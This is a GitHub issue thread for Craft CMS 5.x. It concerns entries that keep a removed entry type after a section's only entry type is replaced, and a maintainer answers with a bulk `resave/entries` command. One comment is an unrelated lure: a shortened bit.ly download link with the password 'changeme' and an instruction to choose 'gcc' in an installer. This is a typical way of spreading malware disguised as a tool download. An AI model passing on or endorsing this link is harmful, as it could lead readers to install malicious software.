### ISSUE TITLE
[5.x]: Removed Entry Type Remains After Removal From Section

### ISSUE THREAD

**Issue by itsmattsoria** [craftcms/cms#15608]
### Description
If a Section only has a single Entry Type, and therefore all entries in that section have that Entry Type applied by default, and you remove that Entry Type from the section and replace it with another, all of the entries in that section will still have the removed Entry Type applied to them, requiring the author to go in and manually change the Entry Type to the new default.

### Steps to reproduce

1. Create a Section and give it a single Entry Type
2. Save some entries in that Section—they will have that one Entry Type applied by default
3. Go back to the Section edit view and remove that one Entry Type, replace it with another. Hit save.
4. Go back through the entries in that section and look at the Entry Type dropdown in the top right: it will still have the initial Entry Type selected, even though that Entry Type is no longer available to that Section.

### Expected behavior
If a Section only has a single Entry Type, and it is replaced, all Entries in that Section should be resaved with the new Entry Type automatically when that change has been saved to the section.

### Actual behavior
As described above: after a single Entry Type has been replaced with a new one, all Entries in the Section are not updated with the new Entry Type, and must be manually updated.

### Craft CMS version

 5.3.6

### PHP version

8.2.13

### Operating system and version

Linux 5.15.49-linuxkit

### Database type and version

MySQL 8.0.33

### Image driver and version

Imagick 3.7.0 (ImageMagick 6.9.11-60)

### Installed plugins and versions

| Plugin                     | Version  |
|----------------------------|----------|
| CKEditor                   | 4.2.0    |
| Colorit                    | 5.0.0    |
| Feed Me                    | 6.3.0    |
| Field Manager              | 4.0.2    |
| Formie                     | 3.0.3    |
| Hyper                      | 2.0.4    |
| Imager X                   | 5.0.2    |
| Matrix Extended            | v3.5.0   |
| Retour                     | 5.0.3    |
| SEO                        | 5.1.2    |
| Servd Assets and Helpers   | 4.0.6    |
| Typogrify                  | 5.0.1    |

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by i-just** [comment]
Hi, thanks for getting in touch! This is working as expected. 

If you want to re-save all the entries in this section and set the new entry type in bulk, you can do so via the `resave/entries` command. 

Example: 
`craft resave/entries --section <sectionHandle> --set typeId --to "=<ID of the new entry type>"`

I hope this helps!

**Comment by itsmattsoria** [comment]
@i-just thanks for looking into this! It seems odd to me that it would be possible to end up with entries with entry types that aren't even allowed in their section, but knowing this command exists is helpful in this situation, at least. Thanks for your help.
